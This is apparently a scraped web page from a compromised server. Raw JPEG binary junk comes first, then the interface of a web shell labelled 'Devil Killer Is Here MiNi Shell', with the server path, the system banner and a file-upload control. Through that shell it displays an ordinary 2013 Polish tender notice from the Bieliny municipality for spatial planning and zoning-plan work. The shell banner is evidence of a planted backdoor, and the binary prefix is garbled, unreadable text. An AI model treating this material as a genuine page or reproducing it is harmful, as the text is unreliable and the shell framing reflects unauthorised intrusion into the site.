JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130128/37246-N-2013.html

<p class="kh_header"><b>Bieliny: Wykonanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Bieliny oraz zmiany miejscowych planów zagospodarowania przestrzennego na terenie miejscowości: Huta Podłysica, Huta Stara, Huta Koszary, Huta Nowa, Bieliny, Czaplów, Porąbki, Kakonin, Górki Napękowskie, Napęków, Belno, Makoszyn, Lechów.</b><br>
<b>Numer ogłoszenia: 37246 - 2013; data zamieszczenia: 28.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieliny , ul. Partyzantów 17, 26-004 Bieliny, woj. świętokrzyskie, faks 041 3026107.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bieliny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Bieliny oraz zmiany miejscowych planów zagospodarowania przestrzennego na terenie miejscowości: Huta Podłysica, Huta Stara, Huta Koszary, Huta Nowa, Bieliny, Czaplów, Porąbki, Kakonin, Górki Napękowskie, Napęków, Belno, Makoszyn, Lechów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia:
1.Teren opracowania dla zmiany miejscowych planów zagospodarowania przestrzennego obejmuje grunty o powierzchni ok. 8732,84 ha położone w 13 miejscowościach w całej Gminie. Obszar Gminy to 8827,77 ha.
2.Teren opracowania zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Bieliny obejmuje grunty o powierzchni 8827,77 ha.
3.Przedmiot umowy należy sporządzić na podstawie aktualnie obowiązujących aktów
prawnych:
Ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz. U. z 2012 r. Nr 647 póź. zm.)
Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. z 2004 r. nr 118, poz. 1233),
Rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587)
Uchwały Nr VII/37/11 Rady Gminy Bieliny z dnia 27 maja 2011 r. w sprawie przystąpienia do sporządzenia projektu zmiany Studium Uwarunkowań 
i Kierunków Zagospodarowania Przestrzennego Gminy Bieliny,
Uchwały Nr VII/38/11 Rady Gminy Bieliny z dnia 27 maja 2011 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Makoszyn,
Uchwały Nr XXIII/132/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Belno,
Uchwały Nr XXIII/133/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Bieliny,
Uchwały Nr XXIII/134/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Czaplów,
Uchwały Nr XXIII/135/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Górki Napękowskie,
Uchwały Nr XXIII/136/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Kakonin,
Uchwały Nr XXIII/137/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Lechów,
Uchwały Nr XXIII/138/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Napęków,
Uchwały Nr XXIII/139/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Huta Nowa,
Uchwały Nr XXIII/140/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Huta Podłysica
Uchwały Nr XXIII/141/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Porąbki
Uchwały Nr XXIII/142/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Huta Stara
Uchwały Nr XXIII/143/12 Rady Gminy Bieliny z dnia 24 września 2012 r. 
w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego Gminy Bieliny - miejscowości Huta Koszary
Ustawy z dnia 20 czerwca 2002 r. w sprawie Zasad techniki prawodawczej (Dz. U. Nr 100 poz. 908 z dnia 5 lipca 2002 r.),
Rozporządzenie Rady Ministrów z dnia 15 października 2012 r. w sprawie państwowego systemu odniesień przestrzennych, przepisów szczególnych dotyczących ochrony środowiska, przyrody, zabytków, prawa wodnego, ochrony gruntów rolnych i leśnych, itd.
4.W ramach przedmiotu zamówienia Wykonawca sporządzi i przekaże Zamawiającemu:
a)kompletny projekt uchwały w sprawie uchwalenia zmiany studium wraz z załącznikami - część tekstowa i graficzna w formie papierowej i wersji elektronicznej (studium uchwalone w wersji ujednoliconej wynikającej z przepisów w zakresie planowania przestrzennego), w tym załączniki graficzne w formie wskazanej w lit. h) i j) - 5 egz.,
b)kompletne projekty planów miejscowych wraz z załącznikami tekstowymi i graficznymi dla każdej miejscowości oddzielenie, w tym załączniki graficzne w formie wskazanej w lit. i) i j) - 5 egz.,
c)opracowanie ekofizjograficzne dla obszaru całej gminy - 5 egz.,
d)prognozę oddziaływania na środowisko do projektu zmiany Studium - 3 egz.,
e)prognozę oddziaływania na środowisko do projektów zmian planów miejscowych dla każdej miejscowości oddzielenie - 3 egz.,
f)prognozę skutków finansowych do projektów zmian planów miejscowych dla każdej miejscowości oddzielenie - 3 egz.,
g)wniosek o przeznaczeniu gruntów rolnych i leśnych na cele nierolnicze i nieleśne - wymagana ilość egzemplarzy + 1 egzemplarz archiwalny dla Gminy
h)rysunki kolorowy Studium obejmujący obszar całej Gminy - 5 egz. (w tym 1 egzemplarz sklejony w całość i naklejony na folii),
i)rysunki kolorowe planów w skali 1: 2 000 w formie planszy złożonej do formatu A4 - 5 egz.,
j)przedmiot umowy w formie zapisu elektronicznego - 3 płyty CD/DVD (nośnik elektroniczny do odczytu i wydruku, a dodatkowo zapis części graficznej - format plików: *.jpg, *.tiff, *.pdf) - oraz w formacie aktywnym i WORD
k)dokumentację formalno - prawną prac nad zmianą Studium i prac nad zmianami planów miejscowych,
l)plansze sekcyjne wykonane na mapie topograficznej; jednakowa wielkość kolejnych sekcji zostanie ustalona w drodze podziału obejmującego cały obszar studium,
m)kompletną bazę graficzną projektów w programie EWMAPA w formie zapisu elektronicznego wektorowego i rastrowego (w formacie 1992 i 2000) - płyta CD/DVD,
n)opracowania graficzne informacji planistycznych stanowiących do planu miejscowego zasób materiałów wyjściowych i analiz, w tym m.in. z zakresu:
uwarunkowań przyrodniczych, kierunków ochrony i kształtowania środowiska przyrodniczego, zasobów krajobrazu kulturowego, zasobów dziedzictwa kulturowego i zabytków, infrastruktury technicznej i komunikacji, rolniczej i leśnej przestrzeni produkcyjnej, uwarunkowań formalno-prawnych, inwentaryzacji urbanistycznej.
5.Zamawiający przekaże Wykonawcy materiały znajdujące się w jego posiadaniu a mogące służyć do opracowania przedmiotu zamówienia. Inne potrzebne materiały [w tym kopię mapy topograficznej oraz map zasadniczych i ewidencyjnych], wykonawca pozyska we własnym zakresie, a ich koszt zawiera się w cenie oferty przetargowej.
6.Część graficzna projektów zostanie wykonana w programie EWMAPA wersji 9 lub wyższej.
7.W ramach realizacji umowy Wykonawca jest zobowiązany do:
a)przygotowania kompletnych materiałów wraz z pismami w wymaganej ilości do instytucji uzgadniających i opiniujących w całym okresie procedury formalno-prawnej wraz z ich przygotowaniem do wysyłki,
b)przeprowadzenia wyłożenia do publicznego wglądu projektów wraz z prognozami oddziaływania na środowisko, co oznacza m.in. przyjmowanie zainteresowanych i udzielanie im informacji, przez okres wymagany przepisami prawa w tym zakresie, tj. zapewni swój udział w trakcie wyłożenia planów nie krócej niż 4 godziny dziennie w ciągu 3 ustalonych dni.
c)przygotowania wykazów i informacji graficznych dotyczących uwag wniesionych do projektów wyłożonych do publicznego wglądu wraz z prognozami oddziaływania na środowisko, z propozycją ich rozstrzygnięcia. Propozycja rozstrzygnięcia winna zawierać uzasadnienie sposobu rozpatrzenia każdej z uwag (z wyłączeniem uwag uwzględnionych w całości)
d)prezentacji projektu zmiany studium i projektu zmiany planu miejscowego oraz uczestnictwa w publicznej dyskusji na temat przyjętych w projektach rozwiązań,
e)prezentacji projektów podczas posiedzeń komisji Rady Gminy,
f)prezentacji projektów podczas sesji Rady Gminy,
g)instalacji kompletnej bazy programu EWMAPA na dwóch wskazanych stanowiskach komputerowych w siedzibie Zamawiającego.
8. Wykonawca przeprowadzi analizę 530 sztuk wniosków, które wpłynęły do Wójta Gminy Bieliny i Urzędu Gminy Bieliny w sprawie zmian miejscowych planów zagospodarowania gm. Bieliny w okresie od 2006 do 2013 roku i przedstawi propozycję ich rozpatrzenia i uzasadnienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 10 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli Wykonawca opracował w ciągu ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
1)  2 projekty Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego lub jego zmiany sporządzonych - od uchwały o przystąpieniu do jego sporządzenia - do uchwały o jego uchwaleniu - według procedury i problematyki określonych w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz. U. z 2012 r. poz. 647), dla obszarów nie mniejszych niż 8 000 ha każde, z tego co najmniej 1 winien obejmować teren objęty obszarem Natura 2000 i co najmniej 1 winien obejmować obszar objęty terenem Parku Krajobrazowego. Studium lub jego zmianę uznaje się za opracowane, jeżeli zostało uchwalone i obowiązuje,
2) 2 projektów planów miejscowych lub zmian planów sporządzonych - od uchwały o przystąpieniu do jego sporządzenia - do uchwały o jego uchwaleniu - według procedury i problematyki określonych w ustawie z dnia 27 marca 2003 r. 
o planowaniu i zagospodarowaniu przestrzennym (tj. Dz. U. z 2012 r. poz. 647), o powierzchni nie mniejszej niż 1000 ha każdy, z tego co najmniej 1 winien obejmować teren objęty obszarem Natura 2000 i co najmniej 1 winien obejmować obszar objęty terenem Parku Krajobrazowego. Plan lub jego zmianę uznaje się za opracowany, jeżeli został uchwalony oraz ogłoszony w Dzienniku Urzędowym Województwa.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania potencjałem technicznym zostanie spełniony przez złożenie oświadczenia o posiadaniu potencjału technicznego zapewniającego wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeżeli Wykonawca dysponuje:
1)  co najmniej dwoma projektantami urbanistami, z których jeden będzie pełnił rolę Głównego projektanta. Osoby te winny posiadać aktualny wpis na listę członków właściwej izby samorządu zawodowego urbanistów (zgodnie z art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz art. 2 ust. 3 i art. 6 ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów) lub posiadać równoważne kwalifikacje w rozumieniu przepisów europejskich (dotyczy Wykonawców z obszaru Unii Europejskiej),
Główny projektant jest osobą posiadającą kwalifikacje do kierowania pracami planistycznymi oraz posiada doświadczenie w wykonaniu, co najmniej:
a) trzech uchwalonych i obowiązujących miejscowych planów zagospodarowania przestrzennego sporządzonych - od podjęcia uchwały o przystąpieniu do jego sporządzenia - do podjęcia uchwały o jego uchwaleniu - według procedur i problematyki określonych w Ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz. U. z 2012 r. poz. 647), w tym co najmniej dwóch planów obejmujących obszar o powierzchni nie mniejszej niż 1000 ha  z tego co najmniej 1 winien obejmować teren objęty obszarem Natura 2000 i co najmniej 1 winien obejmować obszar objęty terenem Parku Krajobrazowego. Plan lub jego zmianę uznaje się za opracowany, jeżeli został uchwalony oraz ogłoszony w Dzienniku Urzędowym Województwa.
b) dwóch projektów Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego lub jego zmian sporządzonych - od uchwały o przystąpieniu do jego sporządzenia - do uchwały o jego uchwaleniu - według procedury 
i problematyki określonych w ustawie z dnia 27 marca 2003 r. o planowaniu 
i zagospodarowaniu przestrzennym (t.j. Dz. U. z 2012 r. poz. 647), dla obszarów nie mniejszych niż 8 000 ha każde, z tego co najmniej 1 winien obejmować teren objęty obszarem Natura 2000 i co najmniej 1 winien obejmować obszar objęty terenem Parku Krajobrazowego. Studium lub jego zmianę uznaje się je za opracowane, jeżeli zostało uchwalone i obowiązuje,

Drugi Projektant urbanista nie będący Głównym projektantem winien posiadać doświadczenie w wykonaniu co najmniej dwóch uchwalonych i obowiązujących miejscowych planów zagospodarowania przestrzennego sporządzonych - od podjęcia uchwały o przystąpieniu do jego sporządzenia - do podjęcia uchwały o jego uchwaleniu - według procedur i problematyki określonych w Ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz. U. z 2012 r. poz. 647),
2) co najmniej czteroosobowym zespołem, który będzie wykonywał zamówienie, projektantami specjalistami we wszystkich dziedzinach związanych z przedmiotem zamówienia, a w szczególności w specjalności: komunikacja, infrastruktura techniczna, ochrona środowiska, skutki finansowe uchwalenia planu - każda z osób winna posiadać doświadczenie w wykonaniu co najmniej dwóch opracowań z zakresu problematyki planów miejscowych lub studium,
3) minimum jedną osobą, która wykona opracowanie ekofizjograficzne posiadającą doświadczenie w sporządzeniu co najmniej dwóch opracowań ekofizjograficznych podstawowych do planów o powierzchni min. 1000 ha każdy, uchwalonych i obowiązujących - przed terminem składania ofert, 
4)	minimum jedną osobą, która wykona prognozy oddziaływania na środowisko  posiadającą doświadczenie w sporządzeniu co najmniej dwóch prognoz oddziaływania na środowisko, w tym jedna do projektu Studium o powierzchni min. 8000 ha i jedna do planu miejscowego o powierzchni min. 1000 ha każdy, każde uchwalone i obowiązujące - przed terminem składania ofert,
5)	minimum jedną osobą posiadającą uprawnienia radcy prawnego lub adwokata.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony poprzez posiadanie opłaconej polisy w wysokości co najmniej 500 000 zł, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w następujących przypadkach:
a). w zakresie zmiany terminu wykonania:
- w przypadku konieczności wykonania zamówień dodatkowych, uniemożliwiających wykonanie zamówienia podstawowego,
- w sytuacji wystąpienia siły wyższej i innych zdarzeń nadzwyczajnych
- w związku z decyzją Zamawiającego o czasowym wstrzymaniu realizacji prac projektowych,
- w przypadku przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji stosownych decyzji, zezwoleń, opinii, uzgodnień itp.
- z powodu rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy
b). w zakresie płatności i innym:
- w przypadku zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia,
- w przypadku uzasadnionej konieczności zmiany harmonogramu realizacji i płatności,
- z powodu zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bieliny.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bieliny
ul. Partyzantów 17
26 -004 Bieliny
pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 10:00, miejsce: Urząd Gminy Bieliny
ul. Partyzantów 17
26 -004 Bieliny
pokój nr 14 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
